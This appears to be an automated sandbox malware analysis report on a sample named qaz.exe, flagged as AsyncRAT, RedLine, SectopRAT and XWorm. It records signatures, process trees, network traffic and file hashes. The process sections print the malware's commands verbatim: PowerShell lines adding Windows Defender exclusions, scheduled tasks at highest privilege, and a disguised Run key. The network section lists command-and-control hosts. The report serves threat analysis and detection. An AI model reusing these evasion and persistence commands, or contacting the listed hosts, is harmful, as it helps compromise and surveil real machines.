Malware Analysis Report

2024-09-11 08:41

Sample ID 240427-n8xecsag2w
Target qaz.exe
SHA256 01072fd48095c4819ac6f11317706a90b0e476b3028cb2b0a628834061e03514
Tags
asyncrat redline sectoprat xworm cheat default infostealer persistence rat trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256

01072fd48095c4819ac6f11317706a90b0e476b3028cb2b0a628834061e03514

Threat Level: Known bad

The file qaz.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat redline sectoprat xworm cheat default infostealer persistence rat trojan

SectopRAT

Xworm family

Detect Xworm Payload

SectopRAT payload

RedLine

AsyncRat

Xworm

RedLine payload

Async RAT payload

Checks computer location settings

Executes dropped EXE

Drops startup file

Adds Run key to start application

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: AddClipboardFormatListener

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported 2024-04-27 12:04

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-04-27 12:04
Reported 2024-04-27 12:07
Platform win7-20240221-en
Max time kernel 146s
Max time network 143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Async RAT payload

rat

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mstc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\schtasks.exe
PID 2292 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\schtasks.exe
PID 2292 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\schtasks.exe
PID 2688 wrote to memory of 1712 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1712 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1712 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2292 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\cmd.exe
PID 2292 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\cmd.exe
PID 2292 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\System32\cmd.exe
PID 2292 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe C:\Windows\system32\cmd.exe
PID 1264 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1264 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1264 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3016 wrote to memory of 980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3016 wrote to memory of 980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3016 wrote to memory of 980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1264 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\mstc.exe
PID 1264 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\mstc.exe
PID 1264 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\mstc.exe
PID 2688 wrote to memory of 1936 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1936 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 1936 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 1476 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\schtasks.exe
PID 1476 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\schtasks.exe
PID 1476 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Roaming\mstc.exe C:\Windows\System32\schtasks.exe
PID 2688 wrote to memory of 2016 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 2016 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe
PID 2688 wrote to memory of 2016 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\qaz.exe

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\qaz.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qaz.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {00D995CD-E7F0-4476-975D-05A42E1E33AF} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mstc" /tr '"C:\Users\Admin\AppData\Roaming\mstc.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA229.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "mstc" /tr '"C:\Users\Admin\AppData\Roaming\mstc.exe"'

C:\Users\Admin\AppData\Roaming\mstc.exe

"C:\Users\Admin\AppData\Roaming\mstc.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\mstc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
EG 41.199.23.195:7000 N/A tcp
N/A 127.0.0.1:7000 N/A tcp
US 8.8.8.8:53 saveclinetsforme68465454711991.publicvm.com udp
NL 91.92.254.108:7000 saveclinetsforme68465454711991.publicvm.com tcp
NL 91.92.254.108:1111 saveclinetsforme68465454711991.publicvm.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
EG 41.199.23.195:7000 N/A tcp
NL 91.92.254.108:7000 saveclinetsforme68465454711991.publicvm.com tcp

Files

memory/2292-0-0x0000000000FE0000-0x0000000000FF2000-memory.dmp

memory/2292-1-0x000007FEF5F80000-0x000007FEF696C000-memory.dmp

memory/1072-6-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/1072-7-0x000000001B230000-0x000000001B512000-memory.dmp

memory/1072-8-0x00000000024F0000-0x00000000024F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 dda272c0f421b0139a0867a231b197fb
SHA1 7c124e587926b7cced5591b99099413ae96247ac
SHA256 ed857e2b7848c80be6e55ff323939e2d9e747bb0dbe444bcb0faa6a6741cb9e7
SHA512 9342e1318a7e3414704c6f195a5487d94aa5f74017bce08d1a6a2c181bf81ecb5cca2a09d502935ba6ef104405d8d32e7892ee6efc8baf79e86d324194d8a1c8

memory/2668-14-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/2668-15-0x0000000002220000-0x0000000002228000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2292-31-0x000000001B270000-0x000000001B2F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\explorer.exe

MD5 676a07c74e4487abada569413214be3f
SHA1 82ff0ba18b54f37b3703ea15b3414d735bd50827
SHA256 01072fd48095c4819ac6f11317706a90b0e476b3028cb2b0a628834061e03514
SHA512 71da9be9e00c19b07ea123a69fa29cc3ce08938f0e82abce58eff3e7c783e1595f1945ea2638bc010860278175694e0dc73b9de356aae1ea2f5e6c8ee1104439

memory/1712-35-0x0000000000230000-0x0000000000242000-memory.dmp

memory/2292-36-0x000007FEF5F80000-0x000007FEF696C000-memory.dmp

memory/2292-37-0x000000001B270000-0x000000001B2F0000-memory.dmp

memory/2292-39-0x0000000000BE0000-0x0000000000BFE000-memory.dmp

memory/2292-40-0x0000000000C80000-0x0000000000C96000-memory.dmp

memory/2292-41-0x000000001DAE0000-0x000000001DE30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpA229.tmp.bat

MD5 5b898445e9d32064d1ddcc8c20cce05d
SHA1 939088c77316b0e9d7ed3c421a472ccfd06129cf
SHA256 b2d01750f29648af6c928d2e94bc8380c63bf9d2e7ba5d9cac240c0fa3fba60a
SHA512 15f632c2e00aa4fd3f44b8b47219dcf2afd20594b90f6db52840ecad17284c76df64f332c528c168986f2e7c2d6d447c4d017f61030063809e0e0a359a58e583

memory/2292-52-0x000007FEF5F80000-0x000007FEF696C000-memory.dmp

memory/1476-56-0x0000000000880000-0x0000000000892000-memory.dmp

memory/1936-58-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

memory/1932-64-0x0000000001F40000-0x0000000001F48000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 201d85df0d77250f19547211c0fabc76
SHA1 366b8f7a5a909f2121e7bc0cb22d1ae6f33d1d38
SHA256 69b5155ad56c45b65fd649cd66056630be180d2c5c5e0ed556b8560ed99e24ae
SHA512 26ae7c45879f2eb12bcd8c8866171c384feaf6c518710ff0f8960ea9a5141202f6f77996154130a47968927b5d9f86753a3fe289e2b1e736709b71cba4a3a71b

memory/2100-71-0x000000001B2A0000-0x000000001B582000-memory.dmp

memory/2100-72-0x0000000002690000-0x0000000002698000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

MD5 819bee869d05421ec90c2fbe1ed03ed9
SHA1 7c52c9ff6f12c323bcf8071f7daa044a0a0cab59
SHA256 64eb99c8ab9b614a93ec32c5377123a0b0ae706e481b139e4b9b7d4f163d49d2
SHA512 6ff3f39013c6c2cf880a075c1ace5dccb8dc25fabdff37212c833a86e0e727de9e19e8d471aa0454ebce9b0d5e6b11261a14a4bf4f75eae057dcde6596ae90aa

memory/2016-90-0x0000000000380000-0x0000000000392000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2024-04-27 12:04
Reported 2024-04-27 12:05
Platform win10v2004-20240419-en
Max time kernel 4s
Max time network 5s

Command Line

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\qaz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\qaz.exe

"C:\Users\Admin\AppData\Local\Temp\qaz.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\qaz.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qaz.exe'

Network

Files

memory/2240-0-0x0000000000940000-0x0000000000952000-memory.dmp

memory/2240-1-0x00007FFBD4530000-0x00007FFBD4FF1000-memory.dmp

memory/4920-2-0x00007FFBD4530000-0x00007FFBD4FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdmtn1jr.3ub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4920-5-0x000001B7EFA50000-0x000001B7EFA60000-memory.dmp

memory/4920-4-0x000001B7EFA50000-0x000001B7EFA60000-memory.dmp

memory/4920-3-0x000001B7D73C0000-0x000001B7D73E2000-memory.dmp

memory/4920-17-0x00007FFBD4530000-0x00007FFBD4FF1000-memory.dmp